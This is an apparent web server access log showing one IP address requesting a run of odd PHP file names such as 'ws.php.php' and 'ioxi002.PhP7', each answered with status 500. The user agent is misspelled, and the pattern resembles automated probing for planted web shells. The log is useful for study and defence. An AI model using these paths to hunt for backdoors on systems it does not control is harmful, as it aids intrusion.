35.181.43.16 - - [18/May/2025:15:59:36 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:59:43 -0400] "GET /ynz.PhP7 HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:59:45 -0400] "GET /themes.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:59:54 -0400] "GET /erin1.PhP7 HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:59:57 -0400] "GET /fosil.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
35.181.43.16 - - [18/May/2025:15:59:58 -0400] "GET /ws.php.php HTTP/1.1" 500 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
